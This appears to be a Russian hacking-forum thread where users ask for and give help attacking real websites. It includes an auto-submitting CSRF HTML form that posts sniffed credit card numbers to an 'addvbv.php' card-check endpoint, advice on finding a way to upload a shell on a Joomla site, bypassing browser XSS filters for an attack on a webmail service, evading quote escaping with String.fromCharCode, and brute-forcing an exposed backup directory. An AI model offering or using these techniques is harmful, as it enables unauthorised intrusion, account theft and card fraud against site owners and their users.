Ваши вопросы по уязвимостям.

не было времени) спал я)
а счас в универе

 

Code:

<html>
<body onload="document.getElementById('poc').submit();">
<form id="poc" method="POST" action="http://site.com/addvbv.php" onSubmit="return false;">
	<input type="hidden" name=ccn value='[тут сниф]'>
	<input type="hidden" name=capt value=''>
	<input type="hidden" name=submit value="Check Now"> <!
name=submit -->
</form>
</body>
</html>

как-нибудь так

ты хотя бы перевел, что он там нашел?

 

Попробую

Я сам не особо понимаю, он весь на английском, Possible secsitive directories насколько я понимаю "Возможно открытая директория"

 

нужно понимание того, что выдает тебе сканер, чтобы потом спрашивать «а можно…»
http://translate.google.ru/

 

Технический перевод

HTML:

Возможные secsitive каталоги - 1125
Каталоги с поддержкой разрешения на выполнение - 17
Возможны важные файлы - 15
Каталог резервной проверки - 16
Файл резервной проверки - 274

Просто я полагаю в джумлe есть какие-то более-менее универсальные уязвимости?

 

http://forum.antichat.ru/thread50600.html

 

Да, я там многие вещи пробовал, но ничего особо не получилось. Там для специальных компонентов джумлы, а я понятия не имею какие на том сайте есть компоненты.

 

кто ж тебе открыть сайт мешает и полистать?

 

Листаю, там в коде есть только component/mailto
и несколько users-components (remind pass итп)
Как-то еще можно проверить, какие компоненты там есть? Сайт довольно простой, не думаю что какие-то модули сверх навороченые туда ставились

 

скинь адрес сайта

 

в личку скинул

 

Из 68 компонент только компонент Content (com_content) найден. База данных сканера небольшая, надо будет потом обновить его.

update: + com_users

 

Все облазил, но ничего так и не нашел что помогло бы залить шелл.

Еще отдельный вопрос о xss пассивке для почтовика.
post xss не хочет работать, однако добрый человек подсказал как вывести ее в get параметр. Но теперь она отказывается работать в ie и хроме. Если хром, это не фатально, то вот с ие очень хотелось чтобы xss работала. Есть ли варианты обойти фильтры ие?

 

Такая вот она жизнь мужик, приходится всякие фильтры обходить)

 

линку в личку

 

пытаюсь намутить активную xss на одном сайте. текст сообщения пишется в js скрипт. ковычки " экранируются слешем. есть варианты обхода?

 

Если JS пропускается то кавычки не нужны, потому что есть волшебный метод fromCharCode() объекта String.

Code:

document.write(String.fromCharCode(65,66,67,68));

Результат будет: ABCD

 

Есть на одном сайтике папка backup не закрытая.
Не подскажите как могут храниться бекапы? Ничего на эту тему в гугле не нашел.

 

JorryGo, не факт что в ней может что-то лежать.
а бэкап от какого-нибудь движка, типа булки, то просто заебешься брутить.
ну а так dirbuster-ом на брут поставь папку

 

Скинул